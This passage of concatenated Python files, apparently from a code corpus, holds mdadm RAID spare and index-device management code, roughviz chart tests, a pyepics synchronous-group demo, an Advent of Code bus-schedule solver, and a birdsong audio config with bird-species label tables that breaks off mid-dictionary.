        # 'Compatible' means close enough in size to the target disk.
        if abs(target.size - candidate.size) < SIZE_VARIATION:
            raids.add(candidate.raid.name)
    return raids
def add_spare(spares):
    """Denote each given disk as an active spare for an mdadm RAID.
    - The spare is added to a RAID with similar disks.
    - It will be shared amongst RAIDs with similar disks.
    :param spares: List of disk device names to add as spares.
    :raises RuntimeError: If a disk is unknown, already in use, or mdadm fails.
    """
    devices = Device.get_devices()

    for spare in spares:
        if spare not in devices:
            raise RuntimeError("No such device: {}.".format(spare))
        dev_ob = devices[spare]

        if dev_ob.state:
            # BUG FIX: report the individual disk, not the whole 'spares' list.
            raise RuntimeError("Disk {} already in use: {}.".format(spare, dev_ob.state))

        compat_raids = _compat_raids(spare, devices)
        if not compat_raids:
            raise RuntimeError("No compatible RAID arrays exist.")

        # Add the spare to an arbitrary compatible RAID; mdadm spare-groups
        # let sibling arrays borrow it when needed.
        raid = list(compat_raids)[0]

        cmd = [settings.SUDO_PATH, ADD_SPARE_CMD, devices[raid].dev_path, dev_ob.dev_path]
        # Was log.error -- running this command is not an error condition.
        log.info('cmd: {}'.format(cmd))
        # Context manager so the temp file is always cleaned up.
        with tempfile.TemporaryFile() as err:
            if subprocess.call(cmd, stdout=err, stderr=err) != 0:
                err.seek(0)
                raise RuntimeError("Could not add spare: {}".format(err.read()))
def remove_spare(spares, trial_run=False):
    """Remove the given spare devices from the appropriate RAID, if possible.
    This should not be done if the RAID is degraded, as it may be copying data to the spare.
    :param spares: List of spare disk names to remove.
    :param bool trial_run: Do everything but run the command.
    :raises RuntimeError: If a disk is unknown, not a spare, or its RAID is degraded.
    """
    devices = Device.get_devices()

    for spare in spares:
        if spare not in devices:
            raise RuntimeError("No such device: {}.".format(spare))
        dev_ob = devices[spare]

        raid = dev_ob.raid
        if raid is None:
            raise RuntimeError("Device {} is not in a RAID.".format(dev_ob.name))
        if raid.disks.get(dev_ob.name) != 'spare':
            raise RuntimeError("Device {} is not a spare.".format(dev_ob.name))

        if raid.degraded:
            raise RuntimeError("Raid device {} (of which {} is a member) is degraded. "
                               "Spares should not be removed.".format(raid.name, dev_ob.name))

        if trial_run:
            return

        cmd = [settings.SUDO_PATH, REMOVE_SPARE_CMD, raid.dev_path, dev_ob.dev_path]
        # Context manager so the temp file is always cleaned up (it leaked before).
        with tempfile.TemporaryFile() as err:
            if subprocess.call(cmd, stdout=err, stderr=err) != 0:
                err.seek(0)
                raise RuntimeError("Could not remove spare: {}".format(err.read()))
def write_mdadm_config(outfile='/etc/mdadm.conf'):
    """
    Write out an mdadm config for the detected RAID devices.
    :param str outfile: Where the config will be written ('-' writes to stdout).
    """
    md = Device.get_devices()
    raids = [md[dev] for dev in md.keys() if md[dev].type == Device.MD_TYPE]

    conf = io.StringIO()

    def write(line):
        # Emit one config line with a trailing newline.
        conf.write(line)
        conf.write('\n')

    write('# This configuration is generated automatically by PcapDB. It should not be '
          'edited manually.\n')
    write('# Send alerts here. This depends on mdadm monitor running in scan mode.')
    if hasattr(settings, 'disk_admin'):
        write('MAILADDR {}'.format(settings.disk_admin))
    else:
        write('# MAILADDR (Could not find an address in settings.disk_admin)')
    write('')
    write('# Automatically search for devices in /proc/partitions.')
    write('DEVICE partitions')
    write('')

    # Figure out what spare groups we need, bucketing member disks by size.
    spare_groups = {}
    for raid in raids:
        for disk in raid.disks.keys():
            for group in spare_groups:
                if abs(group - md[disk].size) < SIZE_VARIATION:
                    spare_groups[group].add(raid)
                    break
            else:
                # No close-enough bucket; this disk's size starts a new one.
                spare_groups[md[disk].size] = {raid}

    # We need to create a mapping from raid to spare_groups, and make sure our groups make sense.
    raid_groups = {}
    for group, members in spare_groups.items():
        for raid in members:
            if raid in raid_groups and group != raid_groups[raid]:
                raise RuntimeError("Raid has disks in multiple spare groups.")
            raid_groups[raid] = group

    # We need more sane names than the raw size of the disk.
    spare_group_names = {group: 'group{0:d}'.format(i)
                         for i, group in enumerate(sorted(spare_groups.keys()))}

    # Now we can finally add the ARRAY lines to the config file.
    for raid in raids:
        sg_name = spare_group_names[raid_groups[raid]]
        if raid.uuid is not None:
            write('ARRAY {raid.dev_path} level={raid.level} num-devices={raid.count:d} '
                  'UUID={raid.uuid} spares={raid.spares} spare-group={spare_group}'.format(
                      raid=raid, spare_group=sg_name))
        else:
            write('ARRAY {raid.dev_path} level={raid.level} num-devices={raid.count:d} '
                  'spares={raid.spares} spare-group={spare_group}'.format(
                      raid=raid, spare_group=sg_name))

    conf.seek(0)
    if outfile == '-':
        sys.stdout.write(conf.read())
    else:
        # Context manager so the file is closed even if the write fails.
        with open(outfile, 'w') as conf_file:
            conf_file.write(conf.read())
def init_index_device(*devices, task=None):
    """
    Initialize a set of disks to serve as our index device.
    - There can only be one index device.
    - Two disks are expected and combined as a RAID 1, though a single disk can be used as well.
    - Additional disks are added as spares.
    :param devices: The disks to include in the RAID.
    :param task: celery.Task
    :return: The new index device.
    :raises: ValueError, RuntimeError
    """
    # BUG FIX: this check must run before dev_obs[0] is indexed below,
    # otherwise an empty argument list raised IndexError instead.
    if not devices:
        raise ValueError("You must specify at least one devices.")

    bd = Device.get_devices()

    dev_obs = []
    # Make sure the disks are suitable for use.
    for dev in devices:
        if dev not in bd:
            raise RuntimeError("Can't find disk: {}.".format(dev))
        dev_ob = bd[dev]
        if dev_ob.state:
            raise RuntimeError("Disk {} already in use: {}".format(dev, dev_ob.state))
        dev_obs.append(dev_ob)

    # Make sure the disks are reasonably close in size.
    first = dev_obs[0]
    for dev_ob in dev_obs[1:]:
        if abs(dev_ob.size - first.size) >= SIZE_VARIATION:
            # BUG FIX: the original formatted 'd1=base' (an int, which has no
            # .dev_path) and used the illegal format field '{d1.size_hr()}',
            # so raising this error crashed with AttributeError instead.
            raise RuntimeError("Disk sizes are too different. {} - {}, {} - {}".format(
                first.dev_path, first.size_hr(), dev_ob.dev_path, dev_ob.size_hr()))

    md_num = _next_md(bd)

    # Create a RAID 1, but with only one working disk.
    mdadm_cmd = [settings.SUDO_PATH, CREATE_INDEX_CMD, '/dev/md{0:d}'.format(md_num),
                 dev_obs[0].dev_path]
    log.info('create index raid command:{}'.format(mdadm_cmd))
    proc = subprocess.Popen(mdadm_cmd, stdout=subprocess.PIPE,
                            stderr=subprocess.PIPE, stdin=subprocess.PIPE)
    # Answer 'y' in case mdadm asks for confirmation.
    outs, errs = proc.communicate(input=b'y', timeout=5)
    if proc.poll() != 0:
        raise RuntimeError("Raid creation failed: {}.".format(errs))

    if len(dev_obs) == 2:
        # Now add the second disk as a spare.
        mdadm_add_cmd = [settings.SUDO_PATH, ADD_SPARE_CMD, '/dev/md{0:d}'.format(md_num),
                         dev_obs[1].dev_path]
        proc = subprocess.Popen(mdadm_add_cmd, stdout=subprocess.PIPE,
                                stderr=subprocess.PIPE, stdin=subprocess.PIPE)
        outs, errs = proc.communicate(input=b'y', timeout=5)
        if proc.poll() != 0:
            # BUG FIX: message typo 'Fail/ed' corrected.
            raise RuntimeError("Failed to add second device: {}.".format(errs))

    if task is not None:
        task.update_state(state='WORKING',
                          meta={'msg': 'Formatting device. This may take a while.',
                                'progress': 5})

    index_device = MDRaidDevice('md{0:d}'.format(md_num))
    index_device.format_xfs(label=settings.INDEX_DEV_LABEL)

    return index_device
def find_index_device():
    """
    Find the device that should be our index device by label. Note that there is
    a delay between filesystem creation and the appearance of the label.
    :return: None or Device
    :rtype: None or Device
    """
    # Poke udev so freshly created filesystem labels show up.
    subprocess.call([settings.SUDO_PATH, UDEV_TRIGGER_CMD],
                    stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)

    matches = [dev for dev in Device.get_devices().values()
               if dev.label == settings.INDEX_DEV_LABEL]
    if len(matches) > 1:
        raise RuntimeError("Multiple index devices. {} and {}."
                           .format(matches[1].uuid, matches[0].uuid))
    return matches[0] if matches else None
|
1689646
|
import pytest
import pandas as pd
from roughviz.charts.stacked_bar import StackedBar
def test_wrong_type_data():
    """A bare dict (rather than a list of dicts) must be rejected."""
    bad_input = {"loc": ["North", "South", "East", "West"], "values": [10, 5, 8, 3]}
    with pytest.raises(TypeError, match="Only valid type of data is list"):
        StackedBar(data=bad_input, labels="loc")
def test_wrong_list_data():
    """A list containing a non-dict element must be rejected."""
    bad_input = [
        {"month": "Jan", "A": 20, "B": 5},
        {"month": "Feb", "A": 25, "B": 10},
        [1, 2, 3],
    ]
    with pytest.raises(TypeError, match="All elements in data need to be dictionary"):
        StackedBar(data=bad_input, labels="month")
def test_wrong_label():
    """A labels key absent from the data dicts must be rejected."""
    rows = [{"month": "Jan", "A": 20, "B": 5}, {"month": "Feb", "A": 25, "B": 10}]
    with pytest.raises(ValueError, match="Label has be to one of labels in data"):
        StackedBar(data=rows, labels="not_exist")
def test_change_options_dict_data():
    """Options can be read and updated after construction."""
    rows = [{"month": "Jan", "A": 20, "B": 5}, {"month": "Feb", "A": 25, "B": 10}]
    chart = StackedBar(data=rows, labels="month")

    # StackedBar has no 'legend' option, so looking it up should raise.
    with pytest.raises(KeyError):
        assert chart.opts["legend"]

    assert chart.opts["title"] == ""
    chart.set_options(title="StackBar")
    assert chart.opts["title"] == "StackBar"
def test_raise_error_with_dataframe():
    """A pandas DataFrame is not an accepted data container."""
    frame = pd.DataFrame({"a": [1, 2], "b": ["a", "b"]})
    with pytest.raises(TypeError):
        StackedBar(data=frame, labels="a")
|
1689716
|
from __future__ import print_function
import time
import epics
import pvnames
# Demo: channel-access synchronous groups (sg_*) with pyepics.
print('== Test get/put for synchronous groups')
pvs = pvnames.motor_list
# Create and connect a low-level CA channel for each motor PV, zeroing each.
chids = [epics.ca.create_channel(pvname) for pvname in pvs]
for chid in chids:
    epics.ca.connect_channel(chid)
    epics.ca.put(chid, 0)
print('Now create synch group ')
sg = epics.ca.sg_create()
# Queue a synchronous-group get for every channel (completed by sg_block).
data = [epics.ca.sg_get(sg, chid) for chid in chids]
print('Now change these PVs for the next 10 seconds')
time.sleep(10.0)
print('Synchronous block:')
epics.ca.sg_block(sg)
print('Done. Values')
for pvname, dat, chid in zip(pvs, data, chids):
    print("%s = %s" % (pvname, str( epics.ca._unpack(dat, chid=chid))))
epics.ca.sg_reset(sg)
print('OK, now we will put everything back to 0 synchronously')
# Puts queued on the group are not committed until the next sg_block.
for chid in chids:
    epics.ca.sg_put(sg, chid, 0)
print('sg_put done, but not blocked / commited. Sleep for 5 seconds ')
time.sleep(5.0)
print('Now Go: ')
epics.ca.sg_block(sg)
print('done.')
|
1689748
|
import time,os
import re
from modint import chinese_remainder
def profiler(method):
    """Decorator that prints how long each call to *method* took."""
    import functools

    @functools.wraps(method)  # preserve the wrapped function's name/docstring
    def wrapper_method(*arg, **kw):
        t = time.time()
        ret = method(*arg, **kw)
        print('Method ' + method.__name__ + ' took : ' + "{:2.5f}".format(time.time() - t) + ' sec')
        return ret
    return wrapper_method
@profiler
def part1():
    """Find the first bus departing after the target time; print id * wait."""
    lines = open('input.txt', 'r').read().split('\n')
    earliest = int(lines[0])
    buses = [int(tok) for tok in re.findall(r'\d+', lines[1])]
    best_wait = earliest
    best_bus = 0
    for bus in buses:
        # Wait until this bus's first departure strictly after 'earliest'.
        wait = (earliest // bus + 1) * bus - earliest
        if wait < best_wait:
            best_wait = wait
            best_bus = bus
    print(best_bus * best_wait)
@profiler
def part2():
    """Find the timestamp where each bus departs at its offset in the list.

    Solved twice: once via the Chinese Remainder Theorem and once with an
    incremental sieve; both answers are printed.
    """
    lines = open('input.txt', 'r').read().split('\n')
    entries = lines[1].split(',')
    # (bus_id, offset) pairs; 'x' slots impose no constraint.
    sched = [(int(bus), offset) for offset, bus in enumerate(entries) if bus != 'x']

    # Solution 1: CRT over (t ≡ -offset mod bus) for every bus.
    moduli = [bus for bus, _ in sched]
    residues = [-offset % bus for bus, offset in sched]
    print(chinese_remainder(moduli, residues))

    # Solution 2: sieve with a stride that grows by each satisfied bus.
    answer = sched[0][0]
    stride = sched[0][0]
    for bus, offset in sched[1:]:
        # Step at least once, then until this bus's constraint holds.
        answer += stride
        while (answer + offset) % bus != 0:
            answer += stride
        stride *= bus
    print(answer)
if __name__ == "__main__":
    # Run both puzzle parts when executed as a script.
    part1()
    part2()
|
1689807
|
import string
from pathlib import Path
class AUDIO_CONFIG:
    """Static audio / mel-spectrogram parameters used across the pipeline."""
    sampling_rate = 32000
    duration = 1          # seconds of audio per clip
    fmin = 500            # mel filterbank lower bound (Hz)
    fmax = 15000          # mel filterbank upper bound (Hz)
    n_mels = 128
    hop_length = 251      # making it 128 in size (frames per clip)
    padmode = 'reflect'
    # Derived values.
    n_fft = n_mels * 20
    samples = sampling_rate * duration
def fill_range(letter_start, letter_end, path_fill, dict_val=None):
    """Map every lowercase letter in [letter_start, letter_end] to path_fill.

    :param letter_start: First letter of the inclusive range.
    :param letter_end: Last letter of the inclusive range.
    :param path_fill: Value stored for each letter key.
    :param dict_val: Optional dict to update in place. BUG FIX: the original
        used a mutable default ({}), which is shared across calls and leaks
        entries between invocations; a fresh dict is now created when omitted.
    :return: The updated dict.
    """
    if dict_val is None:
        dict_val = {}
    alphabet = string.ascii_lowercase
    for letter in alphabet[alphabet.index(letter_start):alphabet.index(letter_end) + 1]:
        dict_val[letter] = path_fill
    return dict_val
def get_dict_value(input_dir):
    """Map each species-code first letter to its resampled-audio directory."""
    letter_ranges = [
        ('a', 'b', "birdsong-resampled-train-audio-00"),
        ('c', 'f', "birdsong-resampled-train-audio-01"),
        ('g', 'm', "birdsong-resampled-train-audio-02"),
        ('n', 'r', "birdsong-resampled-train-audio-03"),
        ('s', 'y', "birdsong-resampled-train-audio-04"),
    ]
    dict_val = {}
    for start, end, subdir in letter_ranges:
        dict_val = fill_range(start, end, input_dir / subdir, dict_val)
    return dict_val
BIRD_CODE = {
'aldfly': 0, 'ameavo': 1, 'amebit': 2, 'amecro': 3, 'amegfi': 4,
'amekes': 5, 'amepip': 6, 'amered': 7, 'amerob': 8, 'amewig': 9,
'amewoo': 10, 'amtspa': 11, 'annhum': 12, 'astfly': 13, 'baisan': 14,
'baleag': 15, 'balori': 16, 'banswa': 17, 'barswa': 18, 'bawwar': 19,
'belkin1': 20, 'belspa2': 21, 'bewwre': 22, 'bkbcuc': 23, 'bkbmag1': 24,
'bkbwar': 25, 'bkcchi': 26, 'bkchum': 27, 'bkhgro': 28, 'bkpwar': 29,
'bktspa': 30, 'blkpho': 31, 'blugrb1': 32, 'blujay': 33, 'bnhcow': 34,
'boboli': 35, 'bongul': 36, 'brdowl': 37, 'brebla': 38, 'brespa': 39,
'brncre': 40, 'brnthr': 41, 'brthum': 42, 'brwhaw': 43, 'btbwar': 44,
'btnwar': 45, 'btywar': 46, 'buffle': 47, 'buggna': 48, 'buhvir': 49,
'bulori': 50, 'bushti': 51, 'buwtea': 52, 'buwwar': 53, 'cacwre': 54,
'calgul': 55, 'calqua': 56, 'camwar': 57, 'cangoo': 58, 'canwar': 59,
'canwre': 60, 'carwre': 61, 'casfin': 62, 'caster1': 63, 'casvir': 64,
'cedwax': 65, 'chispa': 66, 'chiswi': 67, 'chswar': 68, 'chukar': 69,
'clanut': 70, 'cliswa': 71, 'comgol': 72, 'comgra': 73, 'comloo': 74,
'commer': 75, 'comnig': 76, 'comrav': 77, 'comred': 78, 'comter': 79,
'comyel': 80, 'coohaw': 81, 'coshum': 82, 'cowscj1': 83, 'daejun': 84,
'doccor': 85, 'dowwoo': 86, 'dusfly': 87, 'eargre': 88, 'easblu': 89,
'easkin': 90, 'easmea': 91, 'easpho': 92, 'eastow': 93, 'eawpew': 94,
'eucdov': 95, 'eursta': 96, 'evegro': 97, 'fiespa': 98, 'fiscro': 99,
'foxspa': 100, 'gadwal': 101, 'gcrfin': 102, 'gnttow': 103, 'gnwtea': 104,
'gockin': 105, 'gocspa': 106, 'goleag': 107, 'grbher3': 108, 'grcfly': 109,
'greegr': 110, 'greroa': 111, 'greyel': 112, 'grhowl': 113, 'grnher': 114,
'grtgra': 115, 'grycat': 116, 'gryfly': 117, 'haiwoo': 118, 'hamfly': 119,
'hergul': 120, 'herthr': 121, 'hoomer': 122, 'hoowar': 123, 'horgre': 124,
'horlar': 125, 'houfin': 126, 'houspa': 127, 'houwre': 128, 'indbun': 129,
'juntit1': 130, 'killde': 131, 'labwoo': 132, 'larspa': 133, 'lazbun': 134,
'leabit': 135, 'leafly': 136, 'leasan': 137, 'lecthr': 138, 'lesgol': 139,
'lesnig': 140, 'lesyel': 141, 'lewwoo': 142, 'linspa': 143, 'lobcur': 144,
'lobdow': 145, 'logshr': 146, 'lotduc': 147, 'louwat': 148, 'macwar': 149,
'magwar': 150, 'mallar3': 151, 'marwre': 152, 'merlin': 153, 'moublu': 154,
'mouchi': 155, 'moudov': 156, 'norcar': 157, 'norfli': 158, 'norhar2': 159,
'normoc': 160, 'norpar': 161, 'norpin': 162, 'norsho': 163, 'norwat': 164,
'nrwswa': 165, 'nutwoo': 166, 'olsfly': 167, 'orcwar': 168, 'osprey': 169,
'ovenbi1': 170, 'palwar': 171, 'pasfly': 172, 'pecsan': 173, 'perfal': 174,
'phaino': 175, 'pibgre': 176, 'pilwoo': 177, 'pingro': 178, 'pinjay': 179,
'pinsis': 180, 'pinwar': 181, 'plsvir': 182, 'prawar': 183, 'purfin': 184,
'pygnut': 185, 'rebmer': 186, 'rebnut': 187, 'rebsap': 188, 'rebwoo': 189,
'redcro': 190, 'redhea': 191, 'reevir1': 192, 'renpha': 193, 'reshaw': 194,
'rethaw': 195, 'rewbla': 196, 'ribgul': 197, 'rinduc': 198, 'robgro': 199,
'rocpig': 200, 'rocwre': 201, 'rthhum': 202, 'ruckin': 203, 'rudduc': 204,
'rufgro': 205, 'rufhum': 206, 'rusbla': 207, 'sagspa1': 208, 'sagthr': 209,
'savspa': 210, 'saypho': 211, 'scatan': 212, 'scoori': 213, 'semplo': 214,
'semsan': 215, 'sheowl': 216, 'shshaw': 217, 'snobun': 218, 'snogoo': 219,
'solsan': 220, 'sonspa': 221, 'sora': 222, 'sposan': 223, 'spotow': 224,
'stejay': 225, 'swahaw': 226, 'swaspa': 227, 'swathr': 228, 'treswa': 229,
'truswa': 230, 'tuftit': 231, 'tunswa': 232, 'veery': 233, 'vesspa': 234,
'vigswa': 235, 'warvir': 236, 'wesblu': 237, 'wesgre': 238, 'weskin': 239,
'wesmea': 240, 'wessan': 241, 'westan': 242, 'wewpew': 243, 'whbnut': 244,
'whcspa': 245, 'whfibi': 246, 'whtspa': 247, 'whtswi': 248, 'wilfly': 249,
'wilsni1': 250, 'wiltur': 251, 'winwre3': 252, 'wlswar': 253, 'wooduc': 254,
'wooscj2': 255, 'woothr': 256, 'y00475': 257, 'yebfly': 258, 'yebsap': 259,
'yehbla': 260, 'yelwar': 261, 'yerwar': 262, 'yetvir': 263
}
EBIRD_LABEL = {'aldfly': 'Empidonax alnorum_Alder Flycatcher',
'ameavo': 'Recurvirostra americana_American Avocet',
'amebit': 'Botaurus lentiginosus_American Bittern',
'amecro': 'Corvus brachyrhynchos_American Crow',
'amegfi': 'Spinus tristis_American Goldfinch',
'amekes': 'Falco sparverius_American Kestrel',
'amepip': 'Anthus rubescens_American Pipit',
'amered': 'Setophaga ruticilla_American Redstart',
'amerob': 'Turdus migratorius_American Robin',
'amewig': 'Mareca americana_American Wigeon',
'amewoo': 'Scolopax minor_American Woodcock',
'amtspa': 'Spizelloides arborea_American Tree Sparrow',
'annhum': "Calypte anna_Anna's Hummingbird",
'astfly': 'Myiarchus cinerascens_Ash-throated Flycatcher',
'baisan': "Calidris bairdii_Baird's Sandpiper",
'baleag': 'Haliaeetus leucocephalus_Bald Eagle',
'balori': 'Icterus galbula_Baltimore Oriole',
'banswa': 'Riparia riparia_Bank Swallow',
'barswa': 'Hirundo rustica_Barn Swallow',
'bawwar': 'Mniotilta varia_Black-and-white Warbler',
'belkin1': 'Megaceryle alcyon_Belted Kingfisher',
'belspa2': "Artemisiospiza belli_Bell's Sparrow",
'bewwre': "Thryomanes bewickii_Bewick's Wren",
'bkbcuc': 'Coccyzus erythropthalmus_Black-billed Cuckoo',
'bkbmag1': 'Pica hudsonia_Black-billed Magpie',
'bkbwar': 'Setophaga fusca_Blackburnian Warbler',
'bkcchi': 'Poecile atricapillus_Black-capped Chickadee',
'bkchum': 'Archilochus alexandri_Black-chinned Hummingbird',
'bkhgro': 'Pheucticus melanocephalus_Black-headed Grosbeak',
'bkpwar': 'Setophaga striata_Blackpoll Warbler',
'bktspa': 'Amphispiza bilineata_Black-throated Sparrow',
'blkpho': 'Sayornis nigricans_Black Phoebe',
'blugrb1': 'Passerina caerulea_Blue Grosbeak',
'blujay': 'Cyanocitta cristata_Blue Jay',
'bnhcow': 'Molothrus ater_Brown-headed Cowbird',
'boboli': 'Dolichonyx oryzivorus_Bobolink',
'bongul': "Chroicocephalus philadelphia_Bonaparte's Gull",
'brdowl': 'Strix varia_Barred Owl',
'brebla': "Euphagus cyanocephalus_Brewer's Blackbird",
'brespa': "Spizella breweri_Brewer's Sparrow",
'brncre': 'Certhia americana_Brown Creeper',
'brnthr': 'Toxostoma rufum_Brown Thrasher',
'brthum': 'Selasphorus platycercus_Broad-tailed Hummingbird',
'brwhaw': 'Buteo platypterus_Broad-winged Hawk',
'btbwar': 'Setophaga caerulescens_Black-throated Blue Warbler',
'btnwar': 'Setophaga virens_Black-throated Green Warbler',
'btywar': 'Setophaga nigrescens_Black-throated Gray Warbler',
'buffle': 'Bucephala albeola_Bufflehead',
'buggna': 'Polioptila caerulea_Blue-gray Gnatcatcher',
'buhvir': 'Vireo solitarius_Blue-headed Vireo',
'bulori': "Icterus bullockii_Bullock's Oriole",
'bushti': 'Psaltriparus minimus_Bushtit',
'buwtea': 'Spatula discors_Blue-winged Teal',
'buwwar': 'Vermivora cyanoptera_Blue-winged Warbler',
'cacwre': 'Campylorhynchus brunneicapillus_Cactus Wren',
'calgul': 'Larus californicus_California Gull',
'calqua': 'Callipepla californica_California Quail',
'camwar': 'Setophaga tigrina_Cape May Warbler',
'cangoo': 'Branta canadensis_Canada Goose',
'canwar': 'Cardellina canadensis_Canada Warbler',
'canwre': 'Catherpes mexicanus_Canyon Wren',
'carwre': 'Thryothorus ludovicianus_Carolina Wren',
'casfin': "Haemorhous cassinii_Cassin's Finch",
'caster1': 'Hydroprogne caspia_Caspian Tern',
'casvir': "Vireo cassinii_Cassin's Vireo",
'cedwax': 'Bombycilla cedrorum_Cedar Waxwing',
'chispa': 'Spizella passerina_Chipping Sparrow',
'chiswi': 'Chaetura pelagica_Chimney Swift',
'chswar': 'Setophaga pensylvanica_Chestnut-sided Warbler',
'chukar': 'Alectoris chukar_Chukar',
'clanut': "Nucifraga columbiana_Clark's Nutcracker",
'cliswa': 'Petrochelidon pyrrhonota_Cliff Swallow',
'comgol': 'Bucephala clangula_Common Goldeneye',
'comgra': 'Quiscalus quiscula_Common Grackle',
'comloo': 'Gavia immer_Common Loon',
'commer': 'Mergus merganser_Common Merganser',
'comnig': 'Chordeiles minor_Common Nighthawk',
'comrav': 'Corvus corax_Common Raven',
'comred': 'Acanthis flammea_Common Redpoll',
'comter': 'Sterna hirundo_Common Tern',
'comyel': 'Geothlypis trichas_Common Yellowthroat',
'coohaw': "Accipiter cooperii_Cooper's Hawk",
'coshum': "Calypte costae_Costa's Hummingbird",
'cowscj1': 'Aphelocoma californica_California Scrub-Jay',
'daejun': 'Junco hyemalis_Dark-eyed Junco',
'doccor': 'Phalacrocorax auritus_Double-crested Cormorant',
'dowwoo': 'Dryobates pubescens_Downy Woodpecker',
'dusfly': 'Empidonax oberholseri_Dusky Flycatcher',
'eargre': 'Podiceps nigricollis_Eared Grebe',
'easblu': 'Sialia sialis_Eastern Bluebird',
'easkin': 'Tyrannus tyrannus_Eastern Kingbird',
'easmea': 'Sturnella magna_Eastern Meadowlark',
'easpho': 'Sayornis phoebe_Eastern Phoebe',
'eastow': 'Pipilo erythrophthalmus_Eastern Towhee',
'eawpew': 'Contopus virens_Eastern Wood-Pewee',
'eucdov': 'Streptopelia decaocto_Eurasian Collared-Dove',
'eursta': 'Sturnus vulgaris_European Starling',
'evegro': 'Coccothraustes vespertinus_Evening Grosbeak',
'fiespa': 'Spizella pusilla_Field Sparrow',
'fiscro': 'Corvus ossifragus_Fish Crow',
'foxspa': 'Passerella iliaca_Fox Sparrow',
'gadwal': 'Mareca strepera_Gadwall',
'gcrfin': 'Leucosticte tephrocotis_Gray-crowned Rosy-Finch',
'gnttow': 'Pipilo chlorurus_Green-tailed Towhee',
'gnwtea': 'Anas crecca_Green-winged Teal',
'gockin': 'Regulus satrapa_Golden-crowned Kinglet',
'gocspa': 'Zonotrichia atricapilla_Golden-crowned Sparrow',
'goleag': 'Aquila chrysaetos_Golden Eagle',
'grbher3': 'Ardea herodias_Great Blue Heron',
'grcfly': 'Myiarchus crinitus_Great Crested Flycatcher',
'greegr': 'Ardea alba_Great Egret',
'greroa': 'Geococcyx californianus_Greater Roadrunner',
'greyel': 'Tringa melanoleuca_Greater Yellowlegs',
'grhowl': 'Bubo virginianus_Great Horned Owl',
'grnher': 'Butorides virescens_Green Heron',
'grtgra': 'Quiscalus mexicanus_Great-tailed Grackle',
'grycat': 'Dumetella carolinensis_Gray Catbird',
'gryfly': 'Empidonax wrightii_Gray Flycatcher',
'haiwoo': 'Dryobates villosus_Hairy Woodpecker',
'hamfly': "Empidonax hammondii_Hammond's Flycatcher",
'hergul': 'Larus argentatus_Herring Gull',
'herthr': 'Catharus guttatus_Hermit Thrush',
'hoomer': 'Lophodytes cucullatus_Hooded Merganser',
'hoowar': 'Setophaga citrina_Hooded Warbler',
'horgre': 'Podiceps auritus_Horned Grebe',
'horlar': 'Eremophila alpestris_Horned Lark',
'houfin': 'Haemorhous mexicanus_House Finch',
'houspa': 'Passer domesticus_House Sparrow',
'houwre': 'Troglodytes aedon_House Wren',
'indbun': 'Passerina cyanea_Indigo Bunting',
'juntit1': 'Baeolophus ridgwayi_Juniper Titmouse',
'killde': 'Charadrius vociferus_Killdeer',
'labwoo': 'Dryobates scalaris_Ladder-backed Woodpecker',
'larspa': 'Chondestes grammacus_Lark Sparrow',
'lazbun': 'Passerina amoena_Lazuli Bunting',
'leabit': 'Ixobrychus exilis_Least Bittern',
'leafly': 'Empidonax minimus_Least Flycatcher',
'leasan': 'Calidris minutilla_Least Sandpiper',
'lecthr': "Toxostoma lecontei_LeConte's Thrasher",
'lesgol': 'Spinus psaltria_Lesser Goldfinch',
'lesnig': 'Chordeiles acutipennis_Lesser Nighthawk',
'lesyel': 'Tringa flavipes_Lesser Yellowlegs',
'lewwoo': "Melanerpes lewis_Lewis's Woodpecker",
'linspa': "Melospiza lincolnii_Lincoln's Sparrow",
'lobcur': 'Numenius americanus_Long-billed Curlew',
'lobdow': 'Limnodromus scolopaceus_Long-billed Dowitcher',
'logshr': 'Lanius ludovicianus_Loggerhead Shrike',
'lotduc': 'Clangula hyemalis_Long-tailed Duck',
'louwat': 'Parkesia motacilla_Louisiana Waterthrush',
'macwar': "Geothlypis tolmiei_MacGillivray's Warbler",
'magwar': 'Setophaga magnolia_Magnolia Warbler',
'mallar3': 'Anas platyrhynchos_Mallard',
'marwre': 'Cistothorus palustris_Marsh Wren',
'merlin': 'Falco columbarius_Merlin',
'moublu': 'Sialia currucoides_Mountain Bluebird',
'mouchi': 'Poecile gambeli_Mountain Chickadee',
'moudov': 'Zenaida macroura_Mourning Dove',
'norcar': 'Cardinalis cardinalis_Northern Cardinal',
'norfli': 'Colaptes auratus_Northern Flicker',
'norhar2': 'Circus hudsonius_Northern Harrier',
'normoc': 'Mimus polyglottos_Northern Mockingbird',
'norpar': 'Setophaga americana_Northern Parula',
'norpin': 'Anas acuta_Northern Pintail',
'norsho': 'Spatula clypeata_Northern Shoveler',
'norwat': 'Parkesia noveboracensis_Northern Waterthrush',
'nrwswa': 'Stelgidopteryx serripennis_Northern Rough-winged Swallow',
'nutwoo': "Dryobates nuttallii_Nuttall's Woodpecker",
'olsfly': 'Contopus cooperi_Olive-sided Flycatcher',
'orcwar': 'Leiothlypis celata_Orange-crowned Warbler',
'osprey': 'Pandion haliaetus_Osprey',
'ovenbi1': 'Seiurus aurocapilla_Ovenbird',
'palwar': 'Setophaga palmarum_Palm Warbler',
'pasfly': 'Empidonax difficilis_Pacific-slope Flycatcher',
'pecsan': 'Calidris melanotos_Pectoral Sandpiper',
'perfal': 'Falco peregrinus_Peregrine Falcon',
'phaino': 'Phainopepla nitens_Phainopepla',
'pibgre': 'Podilymbus podiceps_Pied-billed Grebe',
'pilwoo': 'Dryocopus pileatus_Pileated Woodpecker',
'pingro': 'Pinicola enucleator_Pine Grosbeak',
'pinjay': 'Gymnorhinus cyanocephalus_Pinyon Jay',
'pinsis': 'Spinus pinus_Pine Siskin',
'pinwar': 'Setophaga pinus_Pine Warbler',
'plsvir': 'Vireo plumbeus_Plumbeous Vireo',
'prawar': 'Setophaga discolor_Prairie Warbler',
'purfin': 'Haemorhous purpureus_Purple Finch',
'pygnut': 'Sitta pygmaea_Pygmy Nuthatch',
'rebmer': 'Mergus serrator_Red-breasted Merganser',
'rebnut': 'Sitta canadensis_Red-breasted Nuthatch',
'rebsap': 'Sphyrapicus ruber_Red-breasted Sapsucker',
'rebwoo': 'Melanerpes carolinus_Red-bellied Woodpecker',
'redcro': 'Loxia curvirostra_Red Crossbill',
'redhea': 'Aythya americana_Redhead',
'reevir1': 'Vireo olivaceus_Red-eyed Vireo',
'renpha': 'Phalaropus lobatus_Red-necked Phalarope',
'reshaw': 'Buteo lineatus_Red-shouldered Hawk',
'rethaw': 'Buteo jamaicensis_Red-tailed Hawk',
'rewbla': 'Agelaius phoeniceus_Red-winged Blackbird',
